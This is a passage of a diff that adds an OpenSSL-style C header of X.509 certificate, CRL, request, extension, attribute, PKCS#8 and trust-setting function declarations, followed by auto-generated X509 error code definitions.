+int i2d_PKCS8PrivateKeyInfo_bio(BIO *bp, EVP_PKEY *key);
+int i2d_PrivateKey_bio(BIO *bp, EVP_PKEY *pkey);
+EVP_PKEY *d2i_PrivateKey_bio(BIO *bp, EVP_PKEY **a);
+int i2d_PUBKEY_bio(BIO *bp, EVP_PKEY *pkey);
+EVP_PKEY *d2i_PUBKEY_bio(BIO *bp, EVP_PKEY **a);
+# endif
+
+X509 *X509_dup(X509 *x509);
+X509_ATTRIBUTE *X509_ATTRIBUTE_dup(X509_ATTRIBUTE *xa);
+X509_EXTENSION *X509_EXTENSION_dup(X509_EXTENSION *ex);
+X509_CRL *X509_CRL_dup(X509_CRL *crl);
+X509_REVOKED *X509_REVOKED_dup(X509_REVOKED *rev);
+X509_REQ *X509_REQ_dup(X509_REQ *req);
+X509_ALGOR *X509_ALGOR_dup(X509_ALGOR *xn);
+int X509_ALGOR_set0(X509_ALGOR *alg, ASN1_OBJECT *aobj, int ptype,
+                    void *pval);
+void X509_ALGOR_get0(ASN1_OBJECT **paobj, int *pptype, void **ppval,
+                     X509_ALGOR *algor);
+void X509_ALGOR_set_md(X509_ALGOR *alg, const EVP_MD *md);
+int X509_ALGOR_cmp(const X509_ALGOR *a, const X509_ALGOR *b);
+
+X509_NAME *X509_NAME_dup(X509_NAME *xn);
+X509_NAME_ENTRY *X509_NAME_ENTRY_dup(X509_NAME_ENTRY *ne);
+
+int X509_cmp_time(const ASN1_TIME *s, time_t *t);
+int X509_cmp_current_time(const ASN1_TIME *s);
+ASN1_TIME *X509_time_adj(ASN1_TIME *s, long adj, time_t *t);
+ASN1_TIME *X509_time_adj_ex(ASN1_TIME *s,
+                            int offset_day, long offset_sec, time_t *t);
+ASN1_TIME *X509_gmtime_adj(ASN1_TIME *s, long adj);
+
+const char *X509_get_default_cert_area(void);
+const char *X509_get_default_cert_dir(void);
+const char *X509_get_default_cert_file(void);
+const char *X509_get_default_cert_dir_env(void);
+const char *X509_get_default_cert_file_env(void);
+const char *X509_get_default_private_dir(void);
+
+X509_REQ *X509_to_X509_REQ(X509 *x, EVP_PKEY *pkey, const EVP_MD *md);
+X509 *X509_REQ_to_X509(X509_REQ *r, int days, EVP_PKEY *pkey);
+
+DECLARE_ASN1_FUNCTIONS(X509_ALGOR)
+DECLARE_ASN1_ENCODE_FUNCTIONS(X509_ALGORS, X509_ALGORS, X509_ALGORS)
+DECLARE_ASN1_FUNCTIONS(X509_VAL)
+
+DECLARE_ASN1_FUNCTIONS(X509_PUBKEY)
+
+int X509_PUBKEY_set(X509_PUBKEY **x, EVP_PKEY *pkey);
+EVP_PKEY *X509_PUBKEY_get(X509_PUBKEY *key);
+int X509_get_pubkey_parameters(EVP_PKEY *pkey, STACK_OF(X509) *chain);
+int i2d_PUBKEY(EVP_PKEY *a, unsigned char **pp);
+EVP_PKEY *d2i_PUBKEY(EVP_PKEY **a, const unsigned char **pp, long length);
+# ifndef OPENSSL_NO_RSA
+int i2d_RSA_PUBKEY(RSA *a, unsigned char **pp);
+RSA *d2i_RSA_PUBKEY(RSA **a, const unsigned char **pp, long length);
+# endif
+# ifndef OPENSSL_NO_DSA
+int i2d_DSA_PUBKEY(DSA *a, unsigned char **pp);
+DSA *d2i_DSA_PUBKEY(DSA **a, const unsigned char **pp, long length);
+# endif
+# ifndef OPENSSL_NO_EC
+int i2d_EC_PUBKEY(EC_KEY *a, unsigned char **pp);
+EC_KEY *d2i_EC_PUBKEY(EC_KEY **a, const unsigned char **pp, long length);
+# endif
+
+DECLARE_ASN1_FUNCTIONS(X509_SIG)
+DECLARE_ASN1_FUNCTIONS(X509_REQ_INFO)
+DECLARE_ASN1_FUNCTIONS(X509_REQ)
+
+DECLARE_ASN1_FUNCTIONS(X509_ATTRIBUTE)
+X509_ATTRIBUTE *X509_ATTRIBUTE_create(int nid, int atrtype, void *value);
+
+DECLARE_ASN1_FUNCTIONS(X509_EXTENSION)
+DECLARE_ASN1_ENCODE_FUNCTIONS(X509_EXTENSIONS, X509_EXTENSIONS, X509_EXTENSIONS)
+
+DECLARE_ASN1_FUNCTIONS(X509_NAME_ENTRY)
+
+DECLARE_ASN1_FUNCTIONS(X509_NAME)
+
+int X509_NAME_set(X509_NAME **xn, X509_NAME *name);
+
+DECLARE_ASN1_FUNCTIONS(X509_CINF)
+
+DECLARE_ASN1_FUNCTIONS(X509)
+DECLARE_ASN1_FUNCTIONS(X509_CERT_AUX)
+
+DECLARE_ASN1_FUNCTIONS(X509_CERT_PAIR)
+
+int X509_get_ex_new_index(long argl, void *argp, CRYPTO_EX_new *new_func,
+                          CRYPTO_EX_dup *dup_func, CRYPTO_EX_free *free_func);
+int X509_set_ex_data(X509 *r, int idx, void *arg);
+void *X509_get_ex_data(X509 *r, int idx);
+int i2d_X509_AUX(X509 *a, unsigned char **pp);
+X509 *d2i_X509_AUX(X509 **a, const unsigned char **pp, long length);
+
+int i2d_re_X509_tbs(X509 *x, unsigned char **pp);
+
+void X509_get0_signature(ASN1_BIT_STRING **psig, X509_ALGOR **palg,
+                         const X509 *x);
+int X509_get_signature_nid(const X509 *x);
+
+int X509_alias_set1(X509 *x, unsigned char *name, int len);
+int X509_keyid_set1(X509 *x, unsigned char *id, int len);
+unsigned char *X509_alias_get0(X509 *x, int *len);
+unsigned char *X509_keyid_get0(X509 *x, int *len);
+int (*X509_TRUST_set_default(int (*trust) (int, X509 *, int))) (int, X509 *,
+                                                                int);
+int X509_TRUST_set(int *t, int trust);
+int X509_add1_trust_object(X509 *x, ASN1_OBJECT *obj);
+int X509_add1_reject_object(X509 *x, ASN1_OBJECT *obj);
+void X509_trust_clear(X509 *x);
+void X509_reject_clear(X509 *x);
+
+DECLARE_ASN1_FUNCTIONS(X509_REVOKED)
+DECLARE_ASN1_FUNCTIONS(X509_CRL_INFO)
+DECLARE_ASN1_FUNCTIONS(X509_CRL)
+
+int X509_CRL_add0_revoked(X509_CRL *crl, X509_REVOKED *rev);
+int X509_CRL_get0_by_serial(X509_CRL *crl,
+                            X509_REVOKED **ret, ASN1_INTEGER *serial);
+int X509_CRL_get0_by_cert(X509_CRL *crl, X509_REVOKED **ret, X509 *x);
+
+X509_PKEY *X509_PKEY_new(void);
+void X509_PKEY_free(X509_PKEY *a);
+int i2d_X509_PKEY(X509_PKEY *a, unsigned char **pp);
+X509_PKEY *d2i_X509_PKEY(X509_PKEY **a, const unsigned char **pp,
+                         long length);
+
+DECLARE_ASN1_FUNCTIONS(NETSCAPE_SPKI)
+DECLARE_ASN1_FUNCTIONS(NETSCAPE_SPKAC)
+DECLARE_ASN1_FUNCTIONS(NETSCAPE_CERT_SEQUENCE)
+
+# ifndef OPENSSL_NO_EVP
+X509_INFO *X509_INFO_new(void);
+void X509_INFO_free(X509_INFO *a);
+char *X509_NAME_oneline(X509_NAME *a, char *buf, int size);
+
+int ASN1_verify(i2d_of_void *i2d, X509_ALGOR *algor1,
+                ASN1_BIT_STRING *signature, char *data, EVP_PKEY *pkey);
+
+int ASN1_digest(i2d_of_void *i2d, const EVP_MD *type, char *data,
+                unsigned char *md, unsigned int *len);
+
+int ASN1_sign(i2d_of_void *i2d, X509_ALGOR *algor1,
+              X509_ALGOR *algor2, ASN1_BIT_STRING *signature,
+              char *data, EVP_PKEY *pkey, const EVP_MD *type);
+
+int ASN1_item_digest(const ASN1_ITEM *it, const EVP_MD *type, void *data,
+                     unsigned char *md, unsigned int *len);
+
+int ASN1_item_verify(const ASN1_ITEM *it, X509_ALGOR *algor1,
+                     ASN1_BIT_STRING *signature, void *data, EVP_PKEY *pkey);
+
+int ASN1_item_sign(const ASN1_ITEM *it, X509_ALGOR *algor1,
+                   X509_ALGOR *algor2, ASN1_BIT_STRING *signature, void *data,
+                   EVP_PKEY *pkey, const EVP_MD *type);
+int ASN1_item_sign_ctx(const ASN1_ITEM *it, X509_ALGOR *algor1,
+                       X509_ALGOR *algor2, ASN1_BIT_STRING *signature,
+                       void *asn, EVP_MD_CTX *ctx);
+# endif
+
+int X509_set_version(X509 *x, long version);
+int X509_set_serialNumber(X509 *x, ASN1_INTEGER *serial);
+ASN1_INTEGER *X509_get_serialNumber(X509 *x);
+int X509_set_issuer_name(X509 *x, X509_NAME *name);
+X509_NAME *X509_get_issuer_name(X509 *a);
+int X509_set_subject_name(X509 *x, X509_NAME *name);
+X509_NAME *X509_get_subject_name(X509 *a);
+int X509_set_notBefore(X509 *x, const ASN1_TIME *tm);
+int X509_set_notAfter(X509 *x, const ASN1_TIME *tm);
+int X509_set_pubkey(X509 *x, EVP_PKEY *pkey);
+EVP_PKEY *X509_get_pubkey(X509 *x);
+ASN1_BIT_STRING *X509_get0_pubkey_bitstr(const X509 *x);
+int X509_certificate_type(X509 *x, EVP_PKEY *pubkey /* optional */ );
+
+int X509_REQ_set_version(X509_REQ *x, long version);
+int X509_REQ_set_subject_name(X509_REQ *req, X509_NAME *name);
+int X509_REQ_set_pubkey(X509_REQ *x, EVP_PKEY *pkey);
+EVP_PKEY *X509_REQ_get_pubkey(X509_REQ *req);
+int X509_REQ_extension_nid(int nid);
+int *X509_REQ_get_extension_nids(void);
+void X509_REQ_set_extension_nids(int *nids);
+STACK_OF(X509_EXTENSION) *X509_REQ_get_extensions(X509_REQ *req);
+int X509_REQ_add_extensions_nid(X509_REQ *req, STACK_OF(X509_EXTENSION) *exts,
+                                int nid);
+int X509_REQ_add_extensions(X509_REQ *req, STACK_OF(X509_EXTENSION) *exts);
+int X509_REQ_get_attr_count(const X509_REQ *req);
+int X509_REQ_get_attr_by_NID(const X509_REQ *req, int nid, int lastpos);
+int X509_REQ_get_attr_by_OBJ(const X509_REQ *req, ASN1_OBJECT *obj,
+                             int lastpos);
+X509_ATTRIBUTE *X509_REQ_get_attr(const X509_REQ *req, int loc);
+X509_ATTRIBUTE *X509_REQ_delete_attr(X509_REQ *req, int loc);
+int X509_REQ_add1_attr(X509_REQ *req, X509_ATTRIBUTE *attr);
+int X509_REQ_add1_attr_by_OBJ(X509_REQ *req,
+                              const ASN1_OBJECT *obj, int type,
+                              const unsigned char *bytes, int len);
+int X509_REQ_add1_attr_by_NID(X509_REQ *req,
+                              int nid, int type,
+                              const unsigned char *bytes, int len);
+int X509_REQ_add1_attr_by_txt(X509_REQ *req,
+                              const char *attrname, int type,
+                              const unsigned char *bytes, int len);
+
+int X509_CRL_set_version(X509_CRL *x, long version);
+int X509_CRL_set_issuer_name(X509_CRL *x, X509_NAME *name);
+int X509_CRL_set_lastUpdate(X509_CRL *x, const ASN1_TIME *tm);
+int X509_CRL_set_nextUpdate(X509_CRL *x, const ASN1_TIME *tm);
+int X509_CRL_sort(X509_CRL *crl);
+
+int X509_REVOKED_set_serialNumber(X509_REVOKED *x, ASN1_INTEGER *serial);
+int X509_REVOKED_set_revocationDate(X509_REVOKED *r, ASN1_TIME *tm);
+
+X509_CRL *X509_CRL_diff(X509_CRL *base, X509_CRL *newer,
+                        EVP_PKEY *skey, const EVP_MD *md, unsigned int flags);
+
+int X509_REQ_check_private_key(X509_REQ *x509, EVP_PKEY *pkey);
+
+int X509_check_private_key(X509 *x509, EVP_PKEY *pkey);
+int X509_chain_check_suiteb(int *perror_depth,
+                            X509 *x, STACK_OF(X509) *chain,
+                            unsigned long flags);
+int X509_CRL_check_suiteb(X509_CRL *crl, EVP_PKEY *pk, unsigned long flags);
+STACK_OF(X509) *X509_chain_up_ref(STACK_OF(X509) *chain);
+
+int X509_issuer_and_serial_cmp(const X509 *a, const X509 *b);
+unsigned long X509_issuer_and_serial_hash(X509 *a);
+
+int X509_issuer_name_cmp(const X509 *a, const X509 *b);
+unsigned long X509_issuer_name_hash(X509 *a);
+
+int X509_subject_name_cmp(const X509 *a, const X509 *b);
+unsigned long X509_subject_name_hash(X509 *x);
+
+# ifndef OPENSSL_NO_MD5
+unsigned long X509_issuer_name_hash_old(X509 *a);
+unsigned long X509_subject_name_hash_old(X509 *x);
+# endif
+
+int X509_cmp(const X509 *a, const X509 *b);
+int X509_NAME_cmp(const X509_NAME *a, const X509_NAME *b);
+unsigned long X509_NAME_hash(X509_NAME *x);
+unsigned long X509_NAME_hash_old(X509_NAME *x);
+
+int X509_CRL_cmp(const X509_CRL *a, const X509_CRL *b);
+int X509_CRL_match(const X509_CRL *a, const X509_CRL *b);
+# ifndef OPENSSL_NO_FP_API
+int X509_print_ex_fp(FILE *bp, X509 *x, unsigned long nmflag,
+                     unsigned long cflag);
+int X509_print_fp(FILE *bp, X509 *x);
+int X509_CRL_print_fp(FILE *bp, X509_CRL *x);
+int X509_REQ_print_fp(FILE *bp, X509_REQ *req);
+int X509_NAME_print_ex_fp(FILE *fp, X509_NAME *nm, int indent,
+                          unsigned long flags);
+# endif
+
+# ifndef OPENSSL_NO_BIO
+int X509_NAME_print(BIO *bp, X509_NAME *name, int obase);
+int X509_NAME_print_ex(BIO *out, X509_NAME *nm, int indent,
+                       unsigned long flags);
+int X509_print_ex(BIO *bp, X509 *x, unsigned long nmflag,
+                  unsigned long cflag);
+int X509_print(BIO *bp, X509 *x);
+int X509_ocspid_print(BIO *bp, X509 *x);
+int X509_CERT_AUX_print(BIO *bp, X509_CERT_AUX *x, int indent);
+int X509_CRL_print(BIO *bp, X509_CRL *x);
+int X509_REQ_print_ex(BIO *bp, X509_REQ *x, unsigned long nmflag,
+                      unsigned long cflag);
+int X509_REQ_print(BIO *bp, X509_REQ *req);
+# endif
+
+int X509_NAME_entry_count(X509_NAME *name);
+int X509_NAME_get_text_by_NID(X509_NAME *name, int nid, char *buf, int len);
+int X509_NAME_get_text_by_OBJ(X509_NAME *name, ASN1_OBJECT *obj,
+                              char *buf, int len);
+
+/*
+ * NOTE: you should be passsing -1, not 0 as lastpos.  The functions that use
+ * lastpos, search after that position on.
+ */
+int X509_NAME_get_index_by_NID(X509_NAME *name, int nid, int lastpos);
+int X509_NAME_get_index_by_OBJ(X509_NAME *name, ASN1_OBJECT *obj,
+                               int lastpos);
+X509_NAME_ENTRY *X509_NAME_get_entry(X509_NAME *name, int loc);
+X509_NAME_ENTRY *X509_NAME_delete_entry(X509_NAME *name, int loc);
+int X509_NAME_add_entry(X509_NAME *name, X509_NAME_ENTRY *ne,
+                        int loc, int set);
+int X509_NAME_add_entry_by_OBJ(X509_NAME *name, ASN1_OBJECT *obj, int type,
+                               unsigned char *bytes, int len, int loc,
+                               int set);
+int X509_NAME_add_entry_by_NID(X509_NAME *name, int nid, int type,
+                               unsigned char *bytes, int len, int loc,
+                               int set);
+X509_NAME_ENTRY *X509_NAME_ENTRY_create_by_txt(X509_NAME_ENTRY **ne,
+                                               const char *field, int type,
+                                               const unsigned char *bytes,
+                                               int len);
+X509_NAME_ENTRY *X509_NAME_ENTRY_create_by_NID(X509_NAME_ENTRY **ne, int nid,
+                                               int type, unsigned char *bytes,
+                                               int len);
+int X509_NAME_add_entry_by_txt(X509_NAME *name, const char *field, int type,
+                               const unsigned char *bytes, int len, int loc,
+                               int set);
+X509_NAME_ENTRY *X509_NAME_ENTRY_create_by_OBJ(X509_NAME_ENTRY **ne,
+                                               ASN1_OBJECT *obj, int type,
+                                               const unsigned char *bytes,
+                                               int len);
+int X509_NAME_ENTRY_set_object(X509_NAME_ENTRY *ne, ASN1_OBJECT *obj);
+int X509_NAME_ENTRY_set_data(X509_NAME_ENTRY *ne, int type,
+                             const unsigned char *bytes, int len);
+ASN1_OBJECT *X509_NAME_ENTRY_get_object(X509_NAME_ENTRY *ne);
+ASN1_STRING *X509_NAME_ENTRY_get_data(X509_NAME_ENTRY *ne);
+
+int X509v3_get_ext_count(const STACK_OF(X509_EXTENSION) *x);
+int X509v3_get_ext_by_NID(const STACK_OF(X509_EXTENSION) *x,
+                          int nid, int lastpos);
+int X509v3_get_ext_by_OBJ(const STACK_OF(X509_EXTENSION) *x,
+                          ASN1_OBJECT *obj, int lastpos);
+int X509v3_get_ext_by_critical(const STACK_OF(X509_EXTENSION) *x,
+                               int crit, int lastpos);
+X509_EXTENSION *X509v3_get_ext(const STACK_OF(X509_EXTENSION) *x, int loc);
+X509_EXTENSION *X509v3_delete_ext(STACK_OF(X509_EXTENSION) *x, int loc);
+STACK_OF(X509_EXTENSION) *X509v3_add_ext(STACK_OF(X509_EXTENSION) **x,
+                                         X509_EXTENSION *ex, int loc);
+
+int X509_get_ext_count(X509 *x);
+int X509_get_ext_by_NID(X509 *x, int nid, int lastpos);
+int X509_get_ext_by_OBJ(X509 *x, ASN1_OBJECT *obj, int lastpos);
+int X509_get_ext_by_critical(X509 *x, int crit, int lastpos);
+X509_EXTENSION *X509_get_ext(X509 *x, int loc);
+X509_EXTENSION *X509_delete_ext(X509 *x, int loc);
+int X509_add_ext(X509 *x, X509_EXTENSION *ex, int loc);
+void *X509_get_ext_d2i(X509 *x, int nid, int *crit, int *idx);
+int X509_add1_ext_i2d(X509 *x, int nid, void *value, int crit,
+                      unsigned long flags);
+
+int X509_CRL_get_ext_count(X509_CRL *x);
+int X509_CRL_get_ext_by_NID(X509_CRL *x, int nid, int lastpos);
+int X509_CRL_get_ext_by_OBJ(X509_CRL *x, ASN1_OBJECT *obj, int lastpos);
+int X509_CRL_get_ext_by_critical(X509_CRL *x, int crit, int lastpos);
+X509_EXTENSION *X509_CRL_get_ext(X509_CRL *x, int loc);
+X509_EXTENSION *X509_CRL_delete_ext(X509_CRL *x, int loc);
+int X509_CRL_add_ext(X509_CRL *x, X509_EXTENSION *ex, int loc);
+void *X509_CRL_get_ext_d2i(X509_CRL *x, int nid, int *crit, int *idx);
+int X509_CRL_add1_ext_i2d(X509_CRL *x, int nid, void *value, int crit,
+                          unsigned long flags);
+
+int X509_REVOKED_get_ext_count(X509_REVOKED *x);
+int X509_REVOKED_get_ext_by_NID(X509_REVOKED *x, int nid, int lastpos);
+int X509_REVOKED_get_ext_by_OBJ(X509_REVOKED *x, ASN1_OBJECT *obj,
+                                int lastpos);
+int X509_REVOKED_get_ext_by_critical(X509_REVOKED *x, int crit, int lastpos);
+X509_EXTENSION *X509_REVOKED_get_ext(X509_REVOKED *x, int loc);
+X509_EXTENSION *X509_REVOKED_delete_ext(X509_REVOKED *x, int loc);
+int X509_REVOKED_add_ext(X509_REVOKED *x, X509_EXTENSION *ex, int loc);
+void *X509_REVOKED_get_ext_d2i(X509_REVOKED *x, int nid, int *crit, int *idx);
+int X509_REVOKED_add1_ext_i2d(X509_REVOKED *x, int nid, void *value, int crit,
+                              unsigned long flags);
+
+X509_EXTENSION *X509_EXTENSION_create_by_NID(X509_EXTENSION **ex,
+                                             int nid, int crit,
+                                             ASN1_OCTET_STRING *data);
+X509_EXTENSION *X509_EXTENSION_create_by_OBJ(X509_EXTENSION **ex,
+                                             ASN1_OBJECT *obj, int crit,
+                                             ASN1_OCTET_STRING *data);
+int X509_EXTENSION_set_object(X509_EXTENSION *ex, ASN1_OBJECT *obj);
+int X509_EXTENSION_set_critical(X509_EXTENSION *ex, int crit);
+int X509_EXTENSION_set_data(X509_EXTENSION *ex, ASN1_OCTET_STRING *data);
+ASN1_OBJECT *X509_EXTENSION_get_object(X509_EXTENSION *ex);
+ASN1_OCTET_STRING *X509_EXTENSION_get_data(X509_EXTENSION *ne);
+int X509_EXTENSION_get_critical(X509_EXTENSION *ex);
+
+int X509at_get_attr_count(const STACK_OF(X509_ATTRIBUTE) *x);
+int X509at_get_attr_by_NID(const STACK_OF(X509_ATTRIBUTE) *x, int nid,
+                           int lastpos);
+int X509at_get_attr_by_OBJ(const STACK_OF(X509_ATTRIBUTE) *sk,
+                           ASN1_OBJECT *obj, int lastpos);
+X509_ATTRIBUTE *X509at_get_attr(const STACK_OF(X509_ATTRIBUTE) *x, int loc);
+X509_ATTRIBUTE *X509at_delete_attr(STACK_OF(X509_ATTRIBUTE) *x, int loc);
+STACK_OF(X509_ATTRIBUTE) *X509at_add1_attr(STACK_OF(X509_ATTRIBUTE) **x,
+                                           X509_ATTRIBUTE *attr);
+STACK_OF(X509_ATTRIBUTE) *X509at_add1_attr_by_OBJ(STACK_OF(X509_ATTRIBUTE)
+                                                  **x, const ASN1_OBJECT *obj,
+                                                  int type,
+                                                  const unsigned char *bytes,
+                                                  int len);
+STACK_OF(X509_ATTRIBUTE) *X509at_add1_attr_by_NID(STACK_OF(X509_ATTRIBUTE)
+                                                  **x, int nid, int type,
+                                                  const unsigned char *bytes,
+                                                  int len);
+STACK_OF(X509_ATTRIBUTE) *X509at_add1_attr_by_txt(STACK_OF(X509_ATTRIBUTE)
+                                                  **x, const char *attrname,
+                                                  int type,
+                                                  const unsigned char *bytes,
+                                                  int len);
+void *X509at_get0_data_by_OBJ(STACK_OF(X509_ATTRIBUTE) *x, ASN1_OBJECT *obj,
+                              int lastpos, int type);
+X509_ATTRIBUTE *X509_ATTRIBUTE_create_by_NID(X509_ATTRIBUTE **attr, int nid,
+                                             int atrtype, const void *data,
+                                             int len);
+X509_ATTRIBUTE *X509_ATTRIBUTE_create_by_OBJ(X509_ATTRIBUTE **attr,
+                                             const ASN1_OBJECT *obj,
+                                             int atrtype, const void *data,
+                                             int len);
+X509_ATTRIBUTE *X509_ATTRIBUTE_create_by_txt(X509_ATTRIBUTE **attr,
+                                             const char *atrname, int type,
+                                             const unsigned char *bytes,
+                                             int len);
+int X509_ATTRIBUTE_set1_object(X509_ATTRIBUTE *attr, const ASN1_OBJECT *obj);
+int X509_ATTRIBUTE_set1_data(X509_ATTRIBUTE *attr, int attrtype,
+                             const void *data, int len);
+void *X509_ATTRIBUTE_get0_data(X509_ATTRIBUTE *attr, int idx, int atrtype,
+                               void *data);
+int X509_ATTRIBUTE_count(X509_ATTRIBUTE *attr);
+ASN1_OBJECT *X509_ATTRIBUTE_get0_object(X509_ATTRIBUTE *attr);
+ASN1_TYPE *X509_ATTRIBUTE_get0_type(X509_ATTRIBUTE *attr, int idx);
+
+int EVP_PKEY_get_attr_count(const EVP_PKEY *key);
+int EVP_PKEY_get_attr_by_NID(const EVP_PKEY *key, int nid, int lastpos);
+int EVP_PKEY_get_attr_by_OBJ(const EVP_PKEY *key, ASN1_OBJECT *obj,
+                             int lastpos);
+X509_ATTRIBUTE *EVP_PKEY_get_attr(const EVP_PKEY *key, int loc);
+X509_ATTRIBUTE *EVP_PKEY_delete_attr(EVP_PKEY *key, int loc);
+int EVP_PKEY_add1_attr(EVP_PKEY *key, X509_ATTRIBUTE *attr);
+int EVP_PKEY_add1_attr_by_OBJ(EVP_PKEY *key,
+                              const ASN1_OBJECT *obj, int type,
+                              const unsigned char *bytes, int len);
+int EVP_PKEY_add1_attr_by_NID(EVP_PKEY *key,
+                              int nid, int type,
+                              const unsigned char *bytes, int len);
+int EVP_PKEY_add1_attr_by_txt(EVP_PKEY *key,
+                              const char *attrname, int type,
+                              const unsigned char *bytes, int len);
+
+int X509_verify_cert(X509_STORE_CTX *ctx);
+
+/* lookup a cert from a X509 STACK */
+X509 *X509_find_by_issuer_and_serial(STACK_OF(X509) *sk, X509_NAME *name,
+                                     ASN1_INTEGER *serial);
+X509 *X509_find_by_subject(STACK_OF(X509) *sk, X509_NAME *name);
+
+DECLARE_ASN1_FUNCTIONS(PBEPARAM)
+DECLARE_ASN1_FUNCTIONS(PBE2PARAM)
+DECLARE_ASN1_FUNCTIONS(PBKDF2PARAM)
+
+int PKCS5_pbe_set0_algor(X509_ALGOR *algor, int alg, int iter,
+                         const unsigned char *salt, int saltlen);
+
+X509_ALGOR *PKCS5_pbe_set(int alg, int iter,
+                          const unsigned char *salt, int saltlen);
+X509_ALGOR *PKCS5_pbe2_set(const EVP_CIPHER *cipher, int iter,
+                           unsigned char *salt, int saltlen);
+X509_ALGOR *PKCS5_pbe2_set_iv(const EVP_CIPHER *cipher, int iter,
+                              unsigned char *salt, int saltlen,
+                              unsigned char *aiv, int prf_nid);
+
+X509_ALGOR *PKCS5_pbkdf2_set(int iter, unsigned char *salt, int saltlen,
+                             int prf_nid, int keylen);
+
+/* PKCS#8 utilities */
+
+DECLARE_ASN1_FUNCTIONS(PKCS8_PRIV_KEY_INFO)
+
+EVP_PKEY *EVP_PKCS82PKEY(PKCS8_PRIV_KEY_INFO *p8);
+PKCS8_PRIV_KEY_INFO *EVP_PKEY2PKCS8(EVP_PKEY *pkey);
+PKCS8_PRIV_KEY_INFO *EVP_PKEY2PKCS8_broken(EVP_PKEY *pkey, int broken);
+PKCS8_PRIV_KEY_INFO *PKCS8_set_broken(PKCS8_PRIV_KEY_INFO *p8, int broken);
+
+int PKCS8_pkey_set0(PKCS8_PRIV_KEY_INFO *priv, ASN1_OBJECT *aobj,
+                    int version, int ptype, void *pval,
+                    unsigned char *penc, int penclen);
+int PKCS8_pkey_get0(ASN1_OBJECT **ppkalg,
+                    const unsigned char **pk, int *ppklen,
+                    X509_ALGOR **pa, PKCS8_PRIV_KEY_INFO *p8);
+
+int X509_PUBKEY_set0_param(X509_PUBKEY *pub, ASN1_OBJECT *aobj,
+                           int ptype, void *pval,
+                           unsigned char *penc, int penclen);
+int X509_PUBKEY_get0_param(ASN1_OBJECT **ppkalg,
+                           const unsigned char **pk, int *ppklen,
+                           X509_ALGOR **pa, X509_PUBKEY *pub);
+
+int X509_check_trust(X509 *x, int id, int flags);
+int X509_TRUST_get_count(void);
+X509_TRUST *X509_TRUST_get0(int idx);
+int X509_TRUST_get_by_id(int id);
+int X509_TRUST_add(int id, int flags, int (*ck) (X509_TRUST *, X509 *, int),
+                   char *name, int arg1, void *arg2);
+void X509_TRUST_cleanup(void);
+int X509_TRUST_get_flags(X509_TRUST *xp);
+char *X509_TRUST_get0_name(X509_TRUST *xp);
+int X509_TRUST_get_trust(X509_TRUST *xp);
+
+/* BEGIN ERROR CODES */
+/*
+ * The following lines are auto generated by the script mkerr.pl. Any changes
+ * made after this point may be overwritten when the script is next run.
+ */
+void ERR_load_X509_strings(void);
+
+/* Error codes for the X509 functions. */
+
+/* Function codes. */
+# define X509_F_ADD_CERT_DIR                              100
+# define X509_F_BY_FILE_CTRL                              101
+# define X509_F_CHECK_POLICY                              145
+# define X509_F_DIR_CTRL                                  102
+# define X509_F_GET_CERT_BY_SUBJECT                       103
+# define X509_F_NETSCAPE_SPKI_B64_DECODE                  129
+# define X509_F_NETSCAPE_SPKI_B64_ENCODE                  130
+# define X509_F_X509AT_ADD1_ATTR                          135
+# define X509_F_X509V3_ADD_EXT                            104
+# define X509_F_X509_ATTRIBUTE_CREATE_BY_NID              136
+# define X509_F_X509_ATTRIBUTE_CREATE_BY_OBJ              137
+# define X509_F_X509_ATTRIBUTE_CREATE_BY_TXT              140
+# define X509_F_X509_ATTRIBUTE_GET0_DATA                  139
+# define X509_F_X509_ATTRIBUTE_SET1_DATA                  138
+# define X509_F_X509_CHECK_PRIVATE_KEY                    128
+# define X509_F_X509_CRL_DIFF                             105
+# define X509_F_X509_CRL_PRINT_FP                         147
+# define X509_F_X509_EXTENSION_CREATE_BY_NID              108
+# define X509_F_X509_EXTENSION_CREATE_BY_OBJ              109
+# define X509_F_X509_GET_PUBKEY_PARAMETERS                110
+# define X509_F_X509_LOAD_CERT_CRL_FILE                   132
+# define X509_F_X509_LOAD_CERT_FILE                       111
+# define X509_F_X509_LOAD_CRL_FILE                        112
+# define X509_F_X509_NAME_ADD_ENTRY                       113
+# define X509_F_X509_NAME_ENTRY_CREATE_BY_NID             114
+# define X509_F_X509_NAME_ENTRY_CREATE_BY_TXT             131
+# define X509_F_X509_NAME_ENTRY_SET_OBJECT                115
+# define X509_F_X509_NAME_ONELINE                         116
+# define X509_F_X509_NAME_PRINT                           117
+# define X509_F_X509_PRINT_EX_FP                          118
+# define X509_F_X509_PUBKEY_GET                           119
+# define X509_F_X509_PUBKEY_SET                           120
+# define X509_F_X509_REQ_CHECK_PRIVATE_KEY                144
+# define X509_F_X509_REQ_PRINT_EX                         121
+# define X509_F_X509_REQ_PRINT_FP                         122
+# define X509_F_X509_REQ_TO_X509                          123
+# define X509_F_X509_STORE_ADD_CERT                       124
+# define X509_F_X509_STORE_ADD_CRL                        125
+# define X509_F_X509_STORE_CTX_GET1_ISSUER                146
+# define X509_F_X509_STORE_CTX_INIT                       143
+# define X509_F_X509_STORE_CTX_NEW                        142
+# define X509_F_X509_STORE_CTX_PURPOSE_INHERIT            134
+# define X509_F_X509_TO_X509_REQ                          126
+# define X509_F_X509_TRUST_ADD                            133
+# define X509_F_X509_TRUST_SET                            141
+# define X509_F_X509_VERIFY_CERT                          127
+
+/* Reason codes. */
+# define X509_R_AKID_MISMATCH                             110
+# define X509_R_BAD_X509_FILETYPE                         100
+# define X509_R_BASE64_DECODE_ERROR                       118
+# define X509_R_CANT_CHECK_DH_KEY                         114
+# define X509_R_CERT_ALREADY_IN_HASH_TABLE                101
+# define X509_R_CRL_ALREADY_DELTA                         127
+# define X509_R_CRL_VERIFY_FAILURE                        131
+# define X509_R_ERR_ASN1_LIB                              102
+# define X509_R_IDP_MISMATCH                              128
+# define X509_R_INVALID_DIRECTORY                         113
+# define X509_R_INVALID_FIELD_NAME                        119
+# define X509_R_INVALID_TRUST                             123
+# define X509_R_ISSUER_MISMATCH                           129
+# define X509_R_KEY_TYPE_MISMATCH                         115
+# define X509_R_KEY_VALUES_MISMATCH                       116
+# define X509_R_LOADING_CERT_DIR                          103
+# define X509_R_LOADING_DEFAULTS                          104
+# define X509_R_METHOD_NOT_SUPPORTED                      124
+# define X509_R_NEWER_CRL_NOT_NEWER                       132
+# define X509_R_NO_CERT_SET_FOR_US_TO_VERIFY              105
+# define X509_R_NO_CRL_NUMBER                             130
+# define X509_R_PUBLIC_KEY_DECODE_ERROR                   125
+# define X509_R_PUBLIC_KEY_ENCODE_ERROR                   126
+# define X509_R_SHOULD_RETRY                              106
